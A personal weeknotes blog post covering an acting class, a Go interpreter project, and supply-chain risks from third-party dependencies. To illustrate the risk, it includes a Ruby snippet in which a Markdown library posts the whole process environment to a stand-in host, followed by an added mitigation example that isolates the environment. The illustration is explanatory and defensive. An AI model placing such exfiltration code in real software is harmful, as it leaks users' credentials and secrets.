Weeknotes 2025 W05: Best performance

January 27–February 2, 2025
1500 words

Random bits:


Stuff happened with the traffic in Berlin this week:


Earlier this week, I managed to put together the best performance so far in my acting class. I put in a ton of time in preparing the piece, and that effort has paid off.

I’ve got this scene nailed down well enough that I’m looking for new material to take to class. I had the idea of writing something myself, but not only am I a slow writer, I fear that I am far too self-conscious to perform something I’ve written myself.


The progress on my Writing an Interpreter book is slow. I was pondering a rewrite of the primary interpreter last week, and I’ve almost got a parser working in Go. It feels like starting over, and it certainly is a little demotivating.

I’m not using Crystal for the interpreter. It’d be faster to get one up and running — Crystal is quite similar to Ruby after all — but the language has a few drawbacks that bother me enough to not consider it as a programming language for this project:

So, Go is it.


Here is an interesting read about the security and reliability of third-party dependencies in code: Can We Retain the Benefits of Transitive Dependencies Without Undermining Security? (Laurence Tratt, 2024).

This article is of particular interest to me because I have given this topic some thought before. I even started designing a capabilities-secure programming language that would avoid the problem described in Tratt’s article. The core idea is described succinctly by Tratt as follows:

The more dependencies we use within a single process, the less suitable the process is as a security mechanism.

I too consider the process no longer suitable as a security mechanism. Consider a third-party dependency that performs conversion of Markdown source to HTML:

module Markdown
  def self.convert_to_html(source)
    # [snip]
  end
end

There is little to prevent this third-party dependency from accessing the filesystem, the environment, or the network:

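require "net/http"

module Markdown
  def self.convert_to_html(source)
    # Nothing stops the library from reading the whole process environment
    # and posting it to a server of its choosing.
    uri = URI("http://www.example.com/upload-env")
    res = Net::HTTP.post_form(uri, ENV.to_h)

    # [real implementation here]
  end
end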

The environment variables tend to contain sensitive information, such as credentials, and exfiltrating that information, like in the example above, would be of great interest to adversaries.
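One mitigation available today, shown as an added example (not code from this post or from Tratt's article): run the converter in a child process that receives only an allowlist of environment variables. `ALLOWED_ENV`, `CONVERTER`, `convert_markdown` and `DEMO_API_TOKEN` are hypothetical names, and the converter is a constructed stand-in that reports which variable names it can see.

```ruby
require "open3"
require "rbconfig"

# Only these variables are handed to the child; everything else is dropped.
ALLOWED_ENV = %w[PATH LANG].freeze

# Constructed stand-in for a third-party converter (an assumption, not a real
# library). Besides a toy conversion, it writes the names of the environment
# variables it can see to stderr, so the caller can observe its access.
CONVERTER = <<~'RUBY'
  paragraphs = $stdin.read.split(/\n{2,}/)
  html = paragraphs.map { |para| "<p>#{para.strip}</p>" }.join("\n")
  $stdout.write(html)
  $stderr.write(ENV.keys.sort.join(","))
RUBY

# Runs the converter in a separate Ruby process.
# isolate: true  -> the child gets only ALLOWED_ENV (unsetenv_others drops the rest).
# isolate: false -> the child inherits the full environment, which is what an
#                   in-process library call can read.
# Returns [html, names_of_env_vars_visible_to_the_converter].
def convert_markdown(source, isolate: true)
  env  = isolate ? ENV.to_h.slice(*ALLOWED_ENV) : {}
  opts = { stdin_data: source, unsetenv_others: isolate }
  out, err, status = Open3.capture3(
    env, RbConfig.ruby, "--disable-gems", "-e", CONVERTER, **opts
  )
  raise "converter failed: #{err}" unless status.success?

  [out, err.split(",")]
end

if __FILE__ == $PROGRAM_NAME
  ENV["DEMO_API_TOKEN"] = "constructed-sample-value" # constructed sample secret
  html, seen = convert_markdown("Hello\n\nWorld")
  puts html
  puts "visible to converter: #{seen.inspect}"
end
```

This narrows only the environment; the child can still reach the filesystem and the network unless the process is sandboxed further.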

To the best of my knowledge, this is a problem in every single mainstream programming language.

And yes, I have been thinking about prototyping a capabilities-secure solution on the level of programming languages. But I fear I severely lack the time to explore this properly.


Entertainment:


Links:

Tech links:


  1. I speak German well enough, I should say. I’m not great at it. ↩︎

  2. I was once cycling there and a race car flew past me, blasting me with a shockwave. Yikes. ↩︎

  3. Ruby, which Crystal is distinctly inspired by, doesn’t have one either. ↩︎

  4. Philip K. Dick, The Minority Report (New York: Pantheon Books, 2009). ↩︎

  5. Martin McDonagh, The Pillowman (London: Faber and Faber Plays, 2003). ↩︎

  6. The Pebble model I got was supposed to be water-resistant, but it wasn’t due to a manufacturing defect. I got a refund, weeks before Pebble shut down. ↩︎

  7. I mysteriously lost my Fitbit almost a year ago. Still very strange how that could’ve happened. ↩︎
